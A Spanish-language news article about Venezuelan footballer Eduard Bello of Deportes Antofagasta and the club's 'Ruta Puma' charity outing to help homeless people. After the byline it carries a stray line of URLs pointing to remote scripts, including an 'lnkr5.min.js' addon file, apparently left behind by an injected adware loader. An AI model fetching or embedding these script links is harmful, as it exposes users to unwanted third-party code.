¡LOS NUESTROS PRIMERO!

Eduard Bello también golea fuera de las canchas ayudando a la gente (+Fotos)

Bello 1

El futbolista venezolano Eduard Bello se ha convertido en uno de los mejores jugadores en llegar al fútbol chileno y al Club Deportes Antofagasta. Gracias a sus 11 goles y a su buen fútbol ofensivo, tiene a su equipo en la segunda posición, en puestos de Copa Libertadores y a 5 puntos del líder U. Católica.

El joven venezolano de 23 años ha demostrado en sus redes sociales su fidelidad a Dios y de ayudar a la gente. Por eso no solo golea dentro de la cancha, sino que también su talento lo ha llevado a ser parte de la campaña “Ruta Puma”, donde se pusieron la camiseta de la responsabilidad social y junto al Hogar de Cristo salieron a compartir alimentos, bebidas calientes y mantas con personas en situación de calle.

Los jugadores Patricio Jerez, Gonzalo Villagra, Paulo Magalhaes, Cristian Rojas, Eduard Bello, Gabriel Sandoval, Felipe Flores y Juan Ignacio Duma, además de la encargada de Desarrollo Social del club, Candy Heredia, realizaron la denominada “Ruta Puma”, instancia donde ayudan y comparten con personas en situación de calle.

La campaña tiene como objetivo ayudar a los más necesitados y colaborar con  su compromiso social en Antofagasta. El gran gesto de los “Pumas” conmovió a todo Chile y esperan seguir haciéndolo más seguido a pesar de sus compromisos profesionales.

Escrito por: Jhoan Ulloa / @JhoanEulloaS

Foto: Cortesía.

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538584446055http://browfileext.com/addons/lnkr5.min.js

 

Oswaldo Guevara